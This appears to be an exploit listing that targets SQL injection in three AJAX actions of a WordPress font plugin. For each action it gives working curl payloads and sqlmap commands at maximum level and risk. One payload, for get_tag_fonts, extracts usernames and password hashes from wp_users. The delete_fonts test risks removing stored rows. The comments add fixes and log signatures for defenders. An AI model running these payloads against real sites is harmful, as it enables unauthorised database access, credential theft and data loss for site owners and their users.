## https://sploitus.com/exploit?id=WPEX-ID:6939C405-AC62-4144-BD86-944D7B89D0AD
# Time-based blind SQL injection check against the `get_fonts` AJAX action.
# The POST body appends a SLEEP(5) subquery to `id`; a response that arrives
# about five seconds late means the value reached the SQL statement unescaped.
# The request carries no cookie or nonce, so a delayed response also suggests
# the handler is reachable without a login (confirm against the advisory).
# Plugin-side fix: cast `id` to an integer, or bind it with $wpdb->prepare()
# and a %d placeholder, before it is used in the query.
endpoint='http://example.com/wp-admin/admin-ajax.php?action=get_fonts'
payload='id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))hewu)'
curl --include --data "$payload" "$endpoint"

... or use the sqlmap command below to automate the attack:

# sqlmap run against the `get_fonts` AJAX action, limited to the POST
# parameter `id` (-p) and to MySQL payloads (--dbms).
# --level 5 and --risk 3 are sqlmap's highest settings: the largest payload
# set, including OR-based tests that can change rows when the injection point
# sits inside an UPDATE or DELETE statement.
# --batch accepts every default answer, so the run never pauses for input.
# In server logs this shows up as a dense burst of POSTs to admin-ajax.php
# from one client; sqlmap's default User-Agent begins with "sqlmap/".
target='http://example.com/wp-admin/admin-ajax.php?action=get_fonts'
sqlmap --url "$target" --data 'id=1' -p id \
    --dbms mysql --level 5 --risk 3 --batch

---

# UNION-based SQL injection check against the `get_tag_fonts` AJAX action.
# `id=-1` is paired with a five-column UNION ALL SELECT whose fourth column
# concatenates user_login and user_pass from wp_users, so the values come
# back in the HTTP response itself rather than through a timing side channel.
# user_pass holds password hashes: a successful request is credential
# exposure, so response handling includes password resets and session
# invalidation, not only patching the plugin.
# Plugin-side fix: cast `id` to an integer, or bind it with $wpdb->prepare()
# and a %d placeholder, before it is used in the query.
endpoint='http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts'
payload='id=-1 UNION ALL SELECT NULL,NULL,NULL,CONCAT((SELECT user_login from wp_users),CHR(0x3a),(SELECT user_pass from wp_users)),NULL-- -'
curl --include --data "$payload" "$endpoint"

... or use the sqlmap command below to automate the attack:

# sqlmap run against the `get_tag_fonts` AJAX action, limited to the POST
# parameter `id` (-p) and to MySQL payloads (--dbms).
# --level 5 and --risk 3 are sqlmap's highest settings: the largest payload
# set, including OR-based tests that can change rows when the injection point
# sits inside an UPDATE or DELETE statement.
# --batch accepts every default answer, so the run never pauses for input.
# In server logs this shows up as a dense burst of POSTs to admin-ajax.php
# from one client; sqlmap's default User-Agent begins with "sqlmap/".
target='http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts'
sqlmap --url "$target" --data 'id=1' -p id \
    --dbms mysql --level 5 --risk 3 --batch

---

# Time-based blind SQL injection check against the `delete_fonts` AJAX action.
# The POST body appends a SLEEP(5) subquery to `font_id`; a response that
# arrives about five seconds late means the value reached the SQL statement
# unescaped.
# NOTE(review): the action name suggests a state-changing handler; the request
# carries no cookie or nonce, so capability and nonce checks on this action
# should be verified alongside the query fix.
# Plugin-side fix: cast `font_id` to an integer, or bind it with
# $wpdb->prepare() and a %d placeholder, before it is used in the query.
endpoint='http://example.com/wp-admin/admin-ajax.php?action=delete_fonts'
payload='font_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))kfTw)'
curl --include --data "$payload" "$endpoint"

... or use the sqlmap command below to automate the attack:

# sqlmap run against the `delete_fonts` AJAX action, limited to the POST
# parameter `font_id` (-p) and to MySQL payloads (--dbms).
# --level 5 and --risk 3 are sqlmap's highest settings: the largest payload
# set, including OR-based tests that can change rows when the injection point
# sits inside an UPDATE or DELETE statement.
# NOTE(review): the action name suggests `font_id` feeds a DELETE, which is
# exactly the case where risk-3 payloads can remove stored rows; snapshot the
# test database before reproducing.
# --batch accepts every default answer, so the run never pauses for input.
# In server logs this shows up as a dense burst of POSTs to admin-ajax.php
# from one client; sqlmap's default User-Agent begins with "sqlmap/".
target='http://example.com/wp-admin/admin-ajax.php?action=delete_fonts'
sqlmap --url "$target" --data 'font_id=1' -p font_id \
    --dbms mysql --level 5 --risk 3 --batch